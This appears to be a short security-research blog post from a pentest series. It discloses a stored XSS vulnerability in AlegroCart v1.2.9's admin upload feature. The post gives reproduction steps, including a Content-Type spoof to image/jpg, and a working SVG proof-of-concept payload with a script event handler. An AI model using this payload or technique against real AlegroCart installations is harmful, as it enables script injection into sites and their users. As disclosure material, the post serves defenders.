Wednesday, 30 April 2025

Friday Fun Pentest Series - 22 - XSS via SVG Image Upload - alegrocartv1.2.9

Description

-  It was noted that the image upload functionality was vulnerable to XSS by uploading a specially crafted SVG image


XSS via SVG Image Upload

Steps to Reproduce:

  1. Visit http://192.168.58.129/alegrocart/administrator/?controller=download
  2. Upload SVG image file with the contents below
  3. Intercept the POST request and change the Content-Type to "Content-Type: image/jpg"
  4. Then visit "http://192.168.58.129/alegrocart/download/xss.svg" to trigger the XSS

<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
    <foreignObject width="100%" height="100%">
        <body xmlns="http://www.w3.org/1999/xhtml">
            <input type="text" onkeyup="prompt('XSS Triggered!')" placeholder="Type here..."/>
        </body>
    </foreignObject>
</svg>


at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Friday Fun Pentest Series - 25 - Stored Cross Site Scripting (XSS) - cubecartv6.5.9

Description - It was noted that the application was vulnerable to Stored Cross Site Scripting Stored Cross Site Scripting #1: Steps to Repro...